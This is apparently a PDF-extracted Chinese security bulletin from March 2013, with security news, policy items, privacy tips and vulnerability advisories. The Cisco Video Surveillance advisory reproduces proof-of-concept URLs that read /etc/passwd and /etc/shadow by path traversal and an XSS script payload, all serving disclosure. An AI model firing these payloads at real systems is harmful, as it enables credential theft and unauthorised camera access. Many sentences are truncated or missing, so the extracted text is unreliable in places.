Professional Documents
Culture Documents
2013 年 3 月 18 日第 41 期
2
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
国盟信息安全通报
(第 41 期)
国际信息安全学习联盟
2013 年 3 月 18 日
国家信息安全漏洞共享平台(以下简称 CNVD)本周共收
70 个、低危漏洞 13 个。上述漏洞中,可利用来实施远程攻击的
了修补方案,建议用户及时下载补丁更新程序,避免遭受网络
码,请使用相关产品的用户注意加强防范。
3
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
主要内容
一、概述 ................................................................ 1
二、安全漏洞增长数量及种类分布情况 ....................................... 1
漏洞产生原因(2013 年 3 月 5 日-2013 年 3 月 18 日) .................................................. 1
三、安全产业动态 ......................................................... 3
移动设备滋生新风险企业如何重铸网络安全 ................................................................... 3
信息安全形势不容乐观代表建议捍卫第四空间 ............................................................... 6
首款国产工业级防火墙在电力系统试运行成功 ............................................................... 8
隐私防泄露网络安全必知必备五大措施 .......................................................................... 8
四、政府之声............................................................ 11
制定手机应用软件安全标准 .......................................................................................... 11
美国防信息系统局购数据恢复软件加强信息安全 ......................................................... 12
邮政局:严重泄露快件信息将吊销快递执照 ................................................................. 13
信息安全问题凸显,国产基础软件产业亟须做大做强 .................................................. 13
五、本期重要漏洞实例 .................................................... 15
Microsoft Silverlight HTML 对象呈现双重释放远程代码执行漏洞 ................................. 15
六、本期网络安全事件 .................................................... 22
路透社编辑被控与黑客合谋攻击洛杉矶时报网站 ......................................................... 22
雅虎用户称邮箱持续遭黑客攻击 ................................................................................... 24
澳大利亚中央银行成为黑客的攻击目标 ........................................................................ 25
黑客入侵修改汇款银行台湾企业受害............................................................................ 28
注:本报根据中国国家信息安全漏洞库(CNNVD)和各大信息安全网站整理分析而成。
4
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
一、概述
国盟信息安全通报是根据国家信息安全漏洞共享平台(以下简称 CNVD)本周共收集、
厂商提供了修补方案,建议用户及时下载补丁更新程序,避免遭受网络攻击。本周互联网
漏洞”等的零日攻击代码,请使用相关产品的用户注意加强防范。
二、安全漏洞增长数量及种类分布情况
漏洞产生原因(2013 年 3 月 5 日-2013 年 3 月 18 日)
漏洞引发的威胁(2013 年 3 月 5 日-2013 年 3 月 18 日)
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
漏洞影响对象类型(2013 年 3 月 5 日-2013 年 3 月 18 日)
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
三、安全产业动态
移动设备滋生新风险企业如何重铸网络安全
强大的移动智能终端和移动互联网让我们现在已经离不开智能手机,并将其带入到工作
指出,可访问企业网络的移动设备的增加为网络犯罪分子提供了一个新的高价值恶意攻击目
标,并为企业带来了潜在的安全风险。
之处,并给出了企业提高移动设备安全性的三个建议:高级防御,细化的应用程序和操作控
制,以及上下文政策。
以下是全文内容:
保护企业网络安全从来都没有像现在这样艰难、复杂或重要。
过去六个月,恶意软件网络增加了 200%。已知的恶意网络,即恶意软件网络,发起了全球
三分之二以上的恶意软件攻击,并且几乎不可能关闭。
大型恶意网络的崛起已将恶意软件转变成为一种高利润的商业模式,结合大众市场和有
针对性威胁来感染用户或盗取敏感信息或专有信息。尽管 IT 社区努力跟上计算机安全威胁
的步伐,越来越多的网络犯罪分子将其注意力转移到移动设备平台带来的漏洞上。
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
新的企业网络
在工作中使用智能手机,其中 2 亿将是员工自有设备。
灵活性,还是通过访客设备计划来支持与合作伙伴或客户之间更密切的工作关系,企业都必
须应对两大挑战。第一,它们必须克服面临网络威胁的风险,以及通过本地移动和移动浏览
器应用程序而造成数据意外丢失的风险。第二,它们必须确保员工遵守企业安全政策。
尽管企业和员工都大踏步前进,积极拥抱“转向更加移动化的劳动力”这一趋势,但是
IT 管理者认为,移动设备提供的生产率和灵活性优势与网络安全威胁增长有着千丝万缕的联
系。
关注这一问题是对的。网络威胁与设备无关,台式机、笔记本电脑和移动设备一样会受
到攻击。可访问企业网络的移动设备的增加为网络犯罪分子提供了一个新的高价值恶意攻击
目标,并为企业带来了潜在的安全风险。
恶意网络是如何运作的
恶意网络是在互联网上广泛流传的恶意软件网络,旨在连续发起针对大众市场的攻击。
它们是由那些试图盗取个人信息或将终端用户系统转化为僵尸网络的网络犯罪分子开发、管
理和维护的。
为了增加复杂性,恶意网络使用这种自我延续的流程来发起多种风格多样的同时攻击。
例如,当一个中毒的大型搜索引擎攻击针对数百万不同的搜索词条时,并发垃圾邮件攻击会
生成数百万个恶意电子邮件。每个攻击都将使用不同的可信网站和激励机制来引诱用户。
由于这些恶意网络基础设施持续的时间比任何单一攻击都要长,网络犯罪分子可迅速适
应新的漏洞,并重复发起新的恶意软件攻击。通过选择互联网上最流行的地点,例如搜索引
擎和社交网络站点,恶意网络能够相对容易地感染多个用户。
为何传统安全措施会失败
随着移动设备在办公场所的兴起,现在,保护企业网络意味着保护用户。然而,针对访
问企业数据的移动设备,员工愿意接受的安全措施和 IT 管理者期待执行的安全措施之间有
着很大的差距。
以下是几个与“允许移动设备访问企业网络”相关的风险:
1. 应用程序安全差距
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
在发布内容。相比较而言,选择减少控制的企业面临很高的数据意外丢失风险,并且无法执
行可接受的使用政策。
2. 网络威胁
网络威胁会任意攻击所有设备,无论是台式机还是移动设备。这些威胁现在也能够重复
利用针对设备的成功桌面战术。目前资料显示,互联网上流传着八个针对移动用户的恶意网
络,其中三个专门针对移动用户。
3. 员工对企业 IT 政策的规避
安全级别的期望值之间有很大差距。例如,许多 IT 管理者认为恶意软件从移动设备蔓延到
企业网络的风险非常高,而绝大多数员工则认为自己的移动设备非常安全。
保卫你的网络
对于那些试图在日益复杂的威胁环境中保护其用户的企业来说,新型安全是必需的。企
业必须寻求统一安全解决方案,它通过为全公司所有用户提供全球威胁保护和统一政策而延
伸企业网络的安全边界。
尽管恶意网络几乎不可能被杀死,但是你可以采取一些步骤来保护你的企业机构。公司
面临的一大问题就是:传统防病毒防御往往不能在造成破坏之前看到恶意网络攻击。传统的
基于特征的防御措施不能跟上这些攻击发起的频率。安全行业必须迁移到可领先恶意网络一
步的主动防御措施。
负日防御提供主动网络安全方式。通过在来源处识别恶意网络并对其进行阻止,企业能
够在新攻击发起之前进行防御。这种新型主动网络防御措施,再加上强大的企业安全政策,
代表着互联网安全的未来发展方向。
企业如何提高移动设备的安全性
到目前为止,企业想方设法寻找各种方式来平衡移动设备带来的好处及其对企业网络构
成的威胁。当今复杂的在线环境需要一个能够满足员工访问需求,同时与 IT 部门对防御威
胁和控制本地移动设备和移动浏览器解决方案相平衡的安全解决方案。
当寻求可延伸至移动设备的企业网络安全解决方案时,应注意以下几点:
1. 高级防御:
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
通过阻止威胁交付机制而不是具体的威胁,负日防御在恶意网络部署之前就能很好地保
护用户。由于负日防御可阻止与已知恶意网络相关的一切,企业也得到了保护,免受这些恶
意基础设施发起的其它任何攻击。重要的是,安全解决方案必须防御与设备无关的威胁,这
些威胁任意攻击笔记本电脑、台式机、智能手机和平板电脑上的用户。
2. 细化的应用程序和操作控制
大部分移动设备级别的解决方案只是简单地阻止整个应用程序,并且不控制移动浏览器
细化应用程序和运行控制的移动设备安全解决方案。这些细化控制将允许你设置灵活的 IT
政策,防止数据意外丢失并确保在更大的环境中执行一致的政策,从而弥合了应用程序安全
漏洞。
3. 上下文政策:
寻求一个支持强大的政策框架、可根据用户、设备、位置和内容而智能运用政策的移动
设备安全解决方案。灵活的解决方案将让企业能够创建“在不影响安全性的情况下同时满足
个人和企业使用需求”的政策。
现在是企业应对这些安全挑战的关键时期。网络犯罪分子利用恶意网络提供的先进技术
增强了自身实力,而员工通过移动设备在企业网络上增加了漏洞。企业了解到允许员工访问
企业数据的危险性,但是还没有确定减轻这些风险的最佳方案。
当今的企业必须寻找一个在整个部署模式中充分利用相同的政策和保护基础设施的网
络安全解决方案,确保无论位置或设备如何,都执行一致的保护措施和政策。利用这一模式,
企业将能够抗击并弥合与移动用户和远程用户相关的移动安全漏洞。
信息安全形势不容乐观代表建议捍卫第四空间
随着全球信息化与移动互联网的迅猛发展,信息空间已成为领土、领海、领空之外的
“第四空间”,信息安全问题也已渗透到人民生活、社会发展、国家安全的各个方面。 全
国人大代表、中国移动广东公司总经理徐龙分析认为,要加快构建“陆、海、空”一体化
的网络信息安全防护体系,捍卫“第四空间”安全。
1、打造网络信息安全防护“天网”。通过完善产业法律法规网,制定权责清晰、高
效实用、分层分级的具体法律法规,切实做到“依法用网、依法管网、依法促网”;通过
完善行业自律规范网,制定行业规范,加强行业监督、监控、监管,净化行业竞争环境,
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
鼓励行业自律,形成信息安全保护的行业规范;通过完善企业内部管理网,引导企业加强
内部管理,建立健全安全防护流程制度。
2、打造网络信息安全地面“堡垒”。通过构建网络信息安全机制堡垒,建立跨企业、
跨行业、跨部门的协同处置机制,形成统一的信息安全保护机制;通过构建网络信息安全
技术堡垒,大力推动在云计算、物联网、移动互联网、下一代互联网等领域的软硬件安全
技术创新和运用,构建一张使用不同协议、与现网物理隔离的备份网络,确保基础功能设
施在紧急情况下的正常运作;通过构建网络信息安全服务堡垒,通过加大信息安全人才队
伍建设、设置专项奖励基金等方式,引导国家机关、科研机构、企业等共同加强信息安全
问题研究攻关,提升互联网运营企业的安全服务提供能力。
3、掀起网络信息安全防范“浪潮”。全面提升全民法律意识,加快现有网络安全相
关法律法规的普及,切实推进人人知法、人人守法、人人用法;全面丰富社会监督手段,
强化全民参与、全民防范、全民受益的社会化监督体制,形成闭环式的网络信息安全监管
体系;全面提高依法严惩的力度,依法严惩网络安全违法行为,彻底斩断网络安全黑色产
业链。
徐龙建议背景:
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
1、信息安全形势不容乐观。据艾瑞咨询统计,2012 年国内每月新增木马病毒超 6 千
2、行业发展缺乏有效规范,部分互联网企业凭借技术手段控制或打压竞争对手的不
正当竞争行为仍然存在,部分安全厂商对网民信息获取行为缺少监管和规范。
3、立法、执法、普法进程仍待推进,“关于加强网络信息保护的决定”议案的审议
通过为后续相关行政法规提供了依据,但在法规的细化、执行的落实、法律意识的普及仍
有待推进。
首款国产工业级防火墙在电力系统试运行成功
近日,国内首款专为电力系统定制的工业级防火墙在宁夏省电力公司调度系统试运行
成功。
该工业级防火墙由工业控制系统安全产品领导厂商北京中科网威信息技术有限公司研
制生产。该工业级防火墙与传统防火墙不同,它采用了独特的硬件技术,与整机无风扇设
在功能方面该款工业级防火墙产品采用了中科网威(NETPOWER)独创的协议精细化解析
技术,可以对电力专有协议指令进行精细化分析与控制,可防止针对电力系统的恶意攻击
行为,全面增加电力控制系统网络的安全性。
用户评价:“该设备在真实环境运行过程中,使调度现场控制网络的安全可靠性大大
提高,极大程度减少了调度现场各二次设备可能出现的异常工作情况以及其所带来的风险,
为确保日常的正常生产运营工作及实现效益最大化起到了有效的保障作用。”
隐私防泄露网络安全必知必备五大措施
随着互联网疆土的不断扩张,人们已经难逃网络的”魔爪“,据观察,部分人每天通
过 PC、手机、平板和其他智能上网设备使用互联网络的碎片时间,加起 来,已经很可能
快要超过睡眠时间了。一天(24 小时-睡眠时间)与网络的无缝连接,让人已经不想再去
区分虚幻与现实,或许这正是网络生活到来的象征。
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
在网络种漫步,搜寻,难免需要各种“通行证”,账号密码成了网络上最为珍贵的资
源之一,你在那些网站上有账号?你有多少个互联网服务账号?账户越多人们的警惕越低,
因为到目前为止,很多人并未因密码泄露等网络安全问题受到很大的困扰。
但需要给每一位提个
醒的是:将重要密码交给网
站保管显然是不靠谱的,因
为即使是大型和超大型高
富帅网站也同样有被屌丝
的时刻,看看下面的有关于
CSDN,Evernote,Twitter,
Facebook,LinkedIn 新闻
旧闻就知道了。
的数据也被完全清除。
想知道骇客将会怎样毁掉你的网络生活吗?最好别知道!赶紧采取下面 5 种措施来保
住你的虚幻世界吧:
1.至少准备两套账号密码
在 所有的网站或者服务上都使用同一套账号密码,有一个天然的优势,容易记忆,也
有一个致命的弱点,一旦一点被攻破,全盘皆输。理想的情况是为每个网站或服务 准备不
同的账号密码组合,但我知道即使是资深的程序员和专门从事入侵的黑客也基本没人能做
到这点。所以我建议,根据账号的重要性来为自己的账号话费等级: 一套密码用于特别重
要的服务(如银行、支付宝、商业邮箱),一套密码用于一般的网络服务(微博、论坛、
其他网站、一般邮箱)。
当然两套账号密码是基本的,用户需根据自己使用网络的习惯来自己划分等级。注意
尽量减少各套账号之间的直接或者间接联系。
2.增加密码强度
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
密码强度指一个密码被非认证的用户或计算机破译的难度。 密码强度通常用“弱”或
“强”来形 容。“弱”和“强”是相对的,不同的密码系统对于密码强度有不同的要求。
密码的破译与系统允许客户尝试不同密码的次数、是否熟悉密码主人等因素相关。
记住,我们需要增加密码强度,我们需要让我们的密码更难破解,不然一个不懂技术,
只懂操作软件界面的低级骇客都能通过密码爆破攻破你的密码,那样太不值得了。当然,
即使再强的密码也有可能被偷取、破译或泄漏。我们所做的一切都是在尽可能的让自己的
网络账号安全。
3.开启多层防护
重 要账户一般都提供多层防护功能,如网上银行、支付宝等直接涉及钱财的网络服务,
一般除了普通密码,还会提供手机短信验证、数字证书和支付密码认证等多层防 护,普通
用户有必要了解这些功能,并开启它,不要嫌麻烦,现在是网络初级阶段,钱财的安全才
是第一位,不然可能不只是网络生活被毁了,甚至有可能导致你的 现实生活也被毁掉。
4.抑制自己的炫耀欲
社交网络上存在太多的有用信息,通过看一个人的微博,你可以了解到一个人的过去、
现 在、爱好、车牌,电话号码和生日。。。如此多的信息,你是否也曾经通过各种渠道在
露出来,坐个高铁还喜欢秀个车牌,暴露下身份证号,发微博暴露自己地址,发贴吧暴露
邮箱。。等等,一切经意,或不经意的瞬间,你的各个侧面都被抓 拍。要是被有心的入侵
者盯上,怕你要惶恐了,因为你的各种隐私都被翻查出来,你会感觉自己裸身暴露在网络
之中。骇客群体把这种一点都不复杂的手段叫做社会 工程学。曾飞要告诉你的是该收收你
的暴露欲或者说炫耀欲了。
5.保持警惕
或许这是最重要的一点:可以帮助你最大限度的减少账号被盗的风险。保持警惕是个
很虚的口号,就想网络安全这个词汇一样,它可以具体到一些细节:
给电脑和平板加上密码;给手机加上密码
定期备份手机上的数据;对于自己不常去的网站,特别警惕
不要随意连接陌生 WIFI;学会用肉眼看域名来识别钓鱼网站和其他不安全站点
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
四、政府之声
制定手机应用软件安全标准
手机生产国,
“但很多用户因为受到病毒的侵扰,手机几乎成了随时可能爆发信息安全事故
的‘手雷’,这需要引起我们的高度警惕。”全国人大代表、中国移动广东公司总经理徐龙说。
他建议,由政府主导,整合社会各方力量,对手机应用商场和手机应用软件加强管理,建立
绿色、安全、诚信的产业环境,确保用户手机信息安全。
徐龙介绍说:
“近年来随着我国移动互联网用户数量、应用水平、终端普及、市场规模等
呈现出迅猛增长的态势,手机的安全问题也逐渐凸显。”
徐龙建议,加快制定信息安全法,以有效规范信息使用和管理工作,促进我国信息安全
保护水平不断提升。同时,建议制定软件应用商场安全标准和手机应用安全标准。
此外,应建立集中化的手机病毒监控基地,研发覆盖全国的手机病毒监控分析系统,对
恶意软件和垃圾短信进行权威判断,定期发布移动互联网安全报告并给予安全预警,对手机
病毒进行实时检测查杀。
消费热点。而其中关于网络消费(网络游戏、QQ 服务、网络推广)的问题最为严重,很多
网友抱怨自己的网络安全得不到保障,更对弹窗广
告有很大抱怨。网友称弹窗肆虐影响了正常的网络
秩序,更可能存在木马、病毒、钓鱼的威胁。网友
陈先生表示:“玩游戏时,其他游戏厂商会进行恶
意推广,一不小心就会弹出广告,妨碍我玩游戏,
心情也被打乱了!”不少女性还认为网购时经常出
现弹窗广告,还总是关不掉,生怕自己的个人隐私
被盗。
由于网络安全技术有待提高,相关互联网从业人员的素养也参差不齐,要想从根本上
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
会再碰到同样的弹窗问题。
弹窗举报入口:http://ie.2345.com/huodong/index.htm?rw
设上限!
另外,活动每天还会从所有举报者中抽出一台平板电脑、两个高级摄影器材包,还会
上开展了丰富的有奖转发活动,大家都可以随时参加并获得以上精美礼品。
微活动有奖转发入口:http://event.weibo.com/785218
美国防信息系统局购数据恢复软件加强信息安全
根据合同,Technica 公司将以“软件服务”的模式,向国防部提供赛门铁克数据恢复平
台,对软件的授权与维护加强管理,防止国防信息系统局与国防部两者的信息技术资产和功
能重复、软件采办过剩。软件即服务模式,将提高软件资产的集中可见性,改进库存配置管
理与控制。
采用“V-射线”技术的赛门铁克数据恢复平台,利用自动化先进技术和标准化操作,使
信息驱动型企业的应用程序、平台、虚拟和物理环境保护得到了简化和统一。
该合同由国防信息系统局企业服务理事会签署。(裴毅东)
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
邮政局:严重泄露快件信息将吊销快递执照
北京商报讯(记者 王璀一)为了确保快递信息的安全,昨日,国家邮政局邮政业消费
者申诉受理中心主任李滨表示,今年国家邮政局将大力整治快递信息泄露问题。
李滨表示,今年国家邮政局将围绕寄递服务信息安全保障,展开一次专项行动,排查寄
递企业的信息安全隐患。对存在问题的企业,将下达书面整改通知书;对于整改不到位的,
确实不具备信息安全保障条件、不适合继续从事寄递服务的,要依法责令其停业整顿,直至
吊销其快递业务经营许可证;发现从事寄递服务信息买卖的寄递企业与从业人员,在证据确
凿的情况下,要依照法律规定从严从重给予行政处罚,构成刑事犯罪的,要依照程序移送司
法机关处理。
多个专门从事快递单号信息交易的网站,由此引发的快递信息安全问题,成为社会关注的焦
点。
信息安全问题凸显,国产基础软件产业亟须做大做强
发展中间件,构建自主可控的信息化网络体系,是一项紧迫的任务。”
作为业界代表,全国人大代表、中创软件工程股份有限公司董事长兼总裁景新海一直十
分关注国家信息化基础设施建设和信息安全保障,提倡大力发展以中间件为代表的国产基础
软件产业。今年两会,景新海建议国家持续支持、企业持续创新、做大做强中间件等基础软
件。他认为,在互联网时代,信息技术水平和信息化能力成为一个国家创新能力的突出体现。
发展中间件,构建自主可控的信息化网络体系,是一项紧迫的任务。
信息安全问题凸显
信息和网络成为国家经济和社会发展新的重要战略资源,信息安全问题也日益凸显。
在我国,随着国民经济和社会信息化进程全面加速,网络与信息系统的基础性和全局性
作用日益增强,信息和网络成为国家经济和社会发展新的重要战略资源,信息安全问题也日
益凸显。党的十八大提出了“四化同步发展”的伟大构想,信息技术作为经济增长“倍增器”、
发展方式“转换器”和产业升级“助推器”的作用将更加显著,同时也对作为信息技术产业
基石的中间件等基础软件的自主创新发展提出了更高要求。
一方面,中间件等基础软件是全球软件产业技术含量最高、开发难度最大、附加值最高、
产业带动性最强的领域。另一方面,信息化基础设施的自主创新发展是国家网络信息安全保
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
障的迫切要求。随着国家信息化建设和两化深度融合的推进,金融、交通、通信、能源、政
务和军事等国民经济重点行业和关键领域构建自主可控信息系统的需求日显迫切,亟须改变
目前国内信息技术关键基础软件大量采用国外产品的不利局面。
景新海告诉记者,今年的政府工作报告提到,要推动科技与经济紧密结合,着力构建以
企业为主体、市场为导向、产学研相结合的技术创新体系。瞄准关系全局和长远发展的战略
必争领域,加强基础研究、前沿先导技术研究。
中间件作为网络时代的信息化基础设施已进入新的发展阶段,《国家中长期科学和技术
发展规划纲要》将其列为优先发展领域,并在“十一五”核高基科技重大专项中给予重点支
持。
支持中间件创新发展
在国家的持续支持和引导下,实现中间件等基础软件持续突破。
“目前,中创中间件可以替代国际同类产品,在金融、交通、通信、能源等国民经济重
点行业和国家‘金税三期’等重大信息化工程中投入应用,并在国家安全和军事信息化领域
进入关键应用,为信息系统自主可控和安全保障起到重要作用。”景新海表示。
同时,在新一代信息技术蓬勃兴起的驱动下,国际厂商通过加大投入、兼并收购等手段
强化核心技术,加快技术与产品的升级换代。“十一五”期间国产基础软件与国外巨头逐渐
缩小了差距,但存在距离再次被拉大的风险。我国形成了一批具有较强技术创新能力和强烈
产业发展责任感的国产基础软件研发的骨干企业,然而这些企业发展时间较短,规模和品牌
远远不及国际巨头,虽然坚持创新、负隅前行,然而尚不足以完全靠自身力量与之抗衡并快
速发展壮大。同时,中间件领域初步形成了以企业为主体、产学研结合的核心技术创新团队,
但进一步聚焦目标、凝心聚力和协同创新需要国家的持续引导与支持。
我国软件产业结构比较全面,中间件等的基础性、关键性决定其在软件产业中的基石和
核心地位,对信息系统安全支撑具有重要价值。景新海建议在国家的持续支持和引导下,继
续发挥产学研创新力量,加速技术创新和成果转化,实现中间件等基础软件持续突破,增强
我国软件整体水平和竞争力。
景新海还建议,在政府集采、国民经济核心系统建设中,优先采用自主可控的中间件等
基础软件;加大对基础软件人才的培养力度,更好地凝聚高端技术人才。
(本报记者 樊哲高)
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
五、本期重要漏洞实例
Microsoft Silverlight HTML 对象呈现双重释放远程代码执行漏洞
发布日期:2013-03-12
更新日期:2013-03-13
受影响系统:
Microsoft Silverlight 5.x
描述:
链接:http://secunia.com/advisories/52547/
http://technet.microsoft.com/security/bulletin/ms13-022
*>
建议:
临时解决方法:
* 临时阻止 Microsoft Silverlight ActiveX 控件在 Internet Explorer 中运行
* 临时阻止 Microsoft Silverlight ActiveX 控件在 Firefox 或 Chrome 中运行
厂商补丁:
Microsoft
---------
Microsoft 已经为此发布了一个安全公告(ms13-022)以及相应补丁:
ms13-022:Vulnerability in Silverlight Could Allow Remote Code Execution (2814124)
链接:http://technet.microsoft.com/security/bulletin/ms13-022
发布日期:2013-03-13
更新日期:2013-03-14
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
受影响系统:
Cisco Video Surveillance Operations Manager 6.3.2
描述:
<%!
protected LinkedList getBwhttpdLog( String logName, String theOrder ) {
String logPath = "/usr/BWhttpd/logs/";
String theLog = logPath + logName;
LinkedList resultList = new LinkedList();
try {
BufferedReader in = new BufferedReader(new FileReader(theLog));
String theLine = "";
while( (theLine = in.readLine()) != null ) { if( theOrder.indexOf("descending") > -1 )
{ resultList.addFirst
(theLine);
} else {
resultList.addLast(theLine);
}
}
-----------------------------------------------
POC:
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
2、本地文件包含漏洞:
select 和 display 日志没有验证日志文件名,如果攻击者通过 http post 请求绕过
/etc/passwd,系统会将其显示为日志文件。
POC:
http://serverip/monitor/logselect.php
3、Cisco Video Surveillance Operations Manager Version 6.3.2 没有对 management
和 view 控制台执行正确的身份验证,远程攻击者可不经身份验证访问系统并查看附带
的摄像机。
POC:
http://serverip/broadware.jsp
4、XSS 漏洞:
Web 应用没有对多数页面执行输入和输出检查,存在 XSS 攻击漏洞。
POC: http://serverip/vsom/index.php/"/title><script>alert("ciscoxss");</script>
<*来源:b.saleh
链接:http://seclists.org/bugtraq/2013/Mar/79
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&amp;log=../../../../../.
./../../../etc/passwd
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&amp;log=../../../../../.
./../../../etc/shadow
http://www.example.com/monitor/logselect.php
http://www.example.com/broadware.jsp
http://www.example.com/vsom/index.php/"/title&gt;&lt;script&gt;a
lert
("ciscoxss");&lt;/script&gt;
建议:
厂商补丁:
Cisco
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主
页以获取最新版本:
http://www.cisco.com/en/US/products/ps9153/index.html
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
厂商补丁:
Linux
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主
页以获取最新版本:
http://www.kernel.org/
微软发布 3 月份安全公告修复多个严重安全漏洞
发布日期:2013-03-13
微软发布了 3 月份的 7 篇安全公告(4 篇“严重”、3 篇“重要”风险级别)。这些公告描述并
修复了 20 个安全漏洞。
我们强烈建议使用 Windows 操作系统的用户立刻检查一下您的系统是否受此漏洞影响,
并按照我们提供的解决方法予以解决。
分析:
微软发布了 3 月份的 7 篇最新的安全公告:MS13-021 到 MS13-027。这些安全公告描
述了
22 个安全问题,分别是有关 Microsoft Internet Explorer, Silverlight, Visio,
SharePoint, OneNote, Office, Kernel 中的漏洞。
1、MS13-021 - Internet Explorer 的累积安全更新
此安全更新解决了 Microsoft IE 中 9 个漏洞。如果用户使用 IE 查看了特制的网页,最
严重的漏洞可允许远程代码执行。
受影响软件:
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9
Internet Explorer 10
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
漏洞描述:
IE 中多个释放后重用漏洞
IE 访问已经删除的内存对象时存在远程代码执行漏洞,可破坏内存,导致任意代码执
行。这些漏洞包括:
Internet Explorer OnResize 释放后重用漏洞(CVE-2013-0087)
Internet Explorer saveHistory 释放后重用漏洞(CVE-2013-0088)
Internet Explorer CMarkupBehaviorContext 释放后重用漏洞(CVE-2013-0089)
Internet Explorer CCaret 释放后重用漏洞(CVE-2013-0090)
Internet Explorer CElement 释放后重用漏洞(CVE-2013-0091)
Internet Explorer GetMarkupPtr 释放后重用漏洞(CVE-2013-0092)
Internet Explorer onBeforeCopy 释放后重用漏洞(CVE-2013-0093)
Internet Explorer removeChild 释放后重用漏洞(CVE-2013-0094)
Internet Explorer CTreeNode 释放后重用漏洞(CVE-2013-1288)
临时解决方案:
* 设置互联网和内联网安全区域设置为“高”
* 配置 IE 在运行活动脚本之前提示或直接禁用。
2、MS13-022 - Silverlight 远程代码执行漏洞
此安全更新解决了 Microsoft Silverlight 中 1 个秘密报告的漏洞。如果攻击者的站点上具
有可利用此漏洞的特制 Silverlight 应用和特制内容,然后用户被诱使查看该站点,该漏
洞可允许远程代码执行。
受影响软件:
Microsoft Silverlight 5
漏洞描述:
Silverlight 双重引用漏洞 - CVE-2013-0074
Microsoft Silverlight 访问内存的方式中存在远程代码执行漏洞,成功利用后可导致
以当前用户安全上下文中执行任意代码。
临时解决方案:
* 临时阻止 Microsoft Silverlight ActiveX 控件在 IE 中运行。
* 临时阻止 Microsoft Silverlight ActiveX 控件在 Firefox 或 Chrome 中运行。
3、MS13-023 - Microsoft Visio Viewer 2010 远程代码执行漏洞
此更新解决了 Microsoft Office 内 1 个秘密报告的漏洞。 如果用户打开特制的 Visio 文件,
此漏洞可允许远程代码执行。
受影响软件:
Microsoft Visio Viewer 2010 Service Pack 1 (32 位)
Microsoft Visio Viewer 2010 Service Pack 1 (64 位)
Microsoft Visio 2010 Service Pack 1 (32 位)
Microsoft Visio 2010 Service Pack 1 (64 位)
Microsoft Office 2010 Filter Pack Service Pack 1 (32 位)
Microsoft Office 2010 Filter Pack Service Pack 1 (64 位)
漏洞描述:
Visio Viewer Tree 对象类型混淆漏洞 - CVE-2013-0079
Microsoft Visio Viewer 在显示特制的 Visio 文件时处理内存的方式存在远程代码执行
漏洞,成功利用后可完全控制受影响系统。
临时解决方案:
国盟信息安全研究小组主办 www.cncisa.com
国盟信息安全通报(2013 年 3 月 18 日第 41 期)
* 设置互联网和内联网安全区域设置为“高”
* 配置 IE 在运行活动脚本之前提示或直接禁用。
* 不要打开从不受信任源接收到的 Office 文件或从受信任源意外接收到的文件。
4、MS13-024 - SharePoint 漏洞允许权限提升
此更新解决了 Microsoft SharePoint 和 Microsoft SharePoint Foundation 中 4 个秘密报
告的漏洞。如果用户点击了通往目标 SharePoint 站点的链接,最严重的漏洞可允许权
限提升。
受影响软件:
Microsoft SharePoint Server 2010 Service Pack 1
Microsoft SharePoint Foundation 2010 Service Pack 1
漏洞描述:
(1) 回调函数漏洞 - CVE-2013-0080
Microsoft SharePoint Server 内存在权限提升漏洞,成功利用后可允许攻击者在获取
敏感系统数据后,提升其服务器的访问权。
(2) SharePoint XSS 漏洞 - CVE-2013-0083
Microsoft SharePoint Server 内存在权限提升漏洞,成功利用此漏洞可以站点管理员
权限发布 SharePoint 命令。
(3) SharePoint 目录遍历漏洞 - CVE-2013-0084
Microsoft SharePoint Server 内存在权限提升漏洞,成功利用后可允许攻击者在获取
敏感系统数据后,提升其服务器的访问权。
(4) 缓冲区溢出漏洞 - CVE-2013-0085
Microsoft SharePoint Server 内存在拒绝服务漏洞,可导致 SharePoint Server 受影
响版本上的 W3WP 进程中断,造成拒绝服务。
5、MS13-025 - Microsoft OneNote 信息泄露漏洞
此更新解决了 Microsoft OneNote 内 1 个秘密报告的漏洞。如果用户打开特制 OneNote
文 件,此漏洞可允许信息泄露。
受影响软件:
Microsoft OneNote 2010 Service Pack 1 (32 位)
